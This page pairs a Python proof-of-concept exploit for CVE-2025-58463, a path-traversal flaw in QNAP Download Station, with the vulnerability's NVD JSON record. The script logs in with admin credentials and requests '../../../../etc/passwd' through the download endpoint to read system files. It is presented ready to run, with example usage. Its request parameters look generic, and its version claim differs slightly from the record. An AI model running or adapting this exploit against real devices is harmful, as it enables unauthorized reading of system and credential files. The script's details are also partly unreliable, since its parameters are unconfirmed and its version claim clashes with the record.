CVE-2025-58463

import requests import urllib.parse # CVE-2025-58463 Path Traversal PoC for QNAP Download Station # Target: QNAP Download Station < 5.10.0.304 # Authentication: Requires administrator account def exploit_path_traversal(target_url, username, password, file_path): """ Exploit path traversal vulnerability in QNAP Download Station. Args: target_url: Base URL of QNAP device (e.g., https://192.168.1.100) username: Administrator username password: Administrator password file_path: File path to read (e.g., ../../../../etc/passwd) Returns: File contents if exploitation successful, None otherwise """ # Step 1: Authentication login_url = f"{target_url}/cgi-bin/authLogin.cgi" login_data = { "username": username, "password": password } session = requests.Session() try: auth_response = session.post(login_url, data=login_data, verify=False, timeout=10) # Step 2: Send path traversal request exploit_url = f"{target_url}/cgi-bin/downloadstation.cgi" exploit_params = { "action": "download", "filename": file_path, # Path traversal payload "source": "external" } response = session.get(exploit_url, params=exploit_params, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Successfully exploited CVE-2025-58463") print(f"[+] Retrieved file: {file_path}") return response.text else: print(f"[-] Exploitation failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None # Example usage if __name__ == "__main__": target = "https://192.168.1.100" user = "admin" pwd = "password" # Read /etc/passwd via path traversal payload = "../../../../etc/passwd" result = exploit_path_traversal(target, user, pwd, payload) if result: print("\n--- File Contents ---") print(result)

{"cve": {"id": "CVE-2025-58463", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:40.780", "lastModified": "2025-11-17T15:40:14.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability has been reported to affect Download Station. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following versions:\nDownload Station 5.10.0.305 ( 2025/09/16 ) and later\nDownload Station 5.10.0.304 ( 2025/09/08 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:download_station:5.10.0.291:*:*:*:*:*:*:*", "matchCriteriaId": "DB5AA38B-9338-4627-89D3-0C6301C2A719"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.1.2929:build_20241025:*:*:*:*:*:*", "matchCriteriaId": "DB92EFD7-47DD-4AAC-97BD-A2D4918FF4ED"}, {"vulnerable": false, "criteria": "cpe:2.3:o:qnap:quts_hero:h5.2.1.2940:build_20241105:*:*:*:*:*:*", "matchCriteriaId": "78E38E23-1AD0-49E1-89FA-73DC2F496137"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:download_station:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.0.291", "versionEndExcluding": "5.10.0.305", "matchCriteriaId": "A82E519C-6822-462D-9C68-14FE5CC90530"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:qnap:qts:5.2.1.2930:build_20241025:*:*:*:*:*:*", "matchCriteriaId": "E3FC6646-2247-4ED9-9643-CD376674E2E7"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-37", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}